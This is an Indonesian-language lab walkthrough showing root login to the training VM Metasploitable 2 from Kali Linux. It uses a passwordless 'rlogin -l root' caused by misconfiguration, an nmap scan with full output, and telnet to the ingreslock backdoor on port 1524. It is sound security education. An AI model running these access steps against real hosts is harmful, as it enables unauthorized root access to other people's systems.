exploitasi celah keamanan rlogin pada os metasploitable 2

Post on 07-Aug-2015

109 Views

Category:

Science

6 Downloads

Preview:

Click to see full reader

TRANSCRIPT

Celah Keamanan RLogin Pada OS Metasploitable 2

OS Target : Metasploitable 2OS Penyerang : Kali LinuxIP Target : 192.168.1.4IP Penyerang : 192.168.1.2Refrensi :

https://informationtreasure.wordpress.com/2014/07/25/metasploitable-2-vulnerability-assessment-and-remote-login/

Kita coba ketikan perintah rlogin maka akan muncul:

Coba ketikan perintah :

rlogin -l root 192.168.1.4

Nanti akan diminta pilihan apakah mau melanjutkan koneksi atau tidak ? Kalau pilh yes, nanti diminta password. Sementara passwordnya kan kita nggak tau. Jadi pemecahan masalah login nya ternyata bukan di urusan mengisi password itu. Tapi ternyata ini servernya ada salah konfigurasi, jadi kita bisa tetap login tanpa password kalau udah menginstal rsh-client.

Karena listrik PLN di rumah tiba-tiba mati, jadi screen shoot selanjutnya tidak bisa ditampilkan. Karena setelah kita menginstal rsh-client maka kita pasti bisa login ke OS Metasploitable 2, karenadisinilah celah keamanannya. Saya sudah menginstal rsh-client di Kali Linux milik saya. Screenshoot nya kurang lebih sama seperti yg dihalaman web di link referensi di atas.

Instal dulu rsh-client nya kalau emang belum terinstal. Cara yg biasa saya pakai untuk mengecek apakah sebuah aplikasi sudah terinstal atau belum, adalah dengan mengetikan perintah:

whereis rsh-client

Kalau jawabannya:

rsh-client:

Maka kalau nggak ada path ke arah lokasi aplikasinya setelah tanda “:” , itu berarti aplikasinya belum terinstal. Untuk menginstal jalankan perintah:

apt-get install rsh-client

Kalau udah terinstal coba lagi jalankan perintah:

rlogin -l root 192.168.1.4

maka hasilnya:

Ketika hasilnya seperti di atas maka kita berarti sudah berhasil login ke OS Metasploitable 2 secara remote dari Kali Linux. Kita berhasil mengakses OS Metasploitable 2 menggunakan hak akses root.

Tambahan:

Kita juga bisa mengakses OS Metasploitable 2 menggunakan hak akses root dengan menggunakan fitur telnet. Pertama mari kita lihat hasil scan port yg terbuka serta service yg berjalan di port itu, scan ini dilakukan menggunakan tool NMAP. Berikut perintah NMAP nya dan hasil scan nya:

nmap -O 192.168.1.4

Starting Nmap 6.47 ( http://nmap.org ) at 2015-02-23 01:14 WITA Nmap scan report for 192.168.1.4 Host is up (0.00087s latency). Not shown: 977 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 23/tcp open telnet 25/tcp open smtp 53/tcp open domain 80/tcp open http 111/tcp open rpcbind 139/tcp open netbios-ssn 445/tcp open microsoft-ds 512/tcp open exec

513/tcp open login 514/tcp open shell 1099/tcp open rmiregistry 1524/tcp open ingreslock 2049/tcp open nfs 2121/tcp open ccproxy-ftp 3306/tcp open mysql 5432/tcp open postgresql 5900/tcp open vnc 6000/tcp open X11 6667/tcp open irc 8009/tcp open ajp13 8180/tcp open unknown MAC Address: 08:00:27:17:37:26 (Cadmus Computer Systems) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 – 2.6.33

Kita lihat di atas ada port TCP 1524 yg menjalankan service ingreslock. Mari kita coba melakukanperintah Telnet ke service itu:

telnet 192.168.1.4 1524

Maka hasilnya:

Untuk keluar dari sesi telnet ini kita ketikan saja:

exit

top related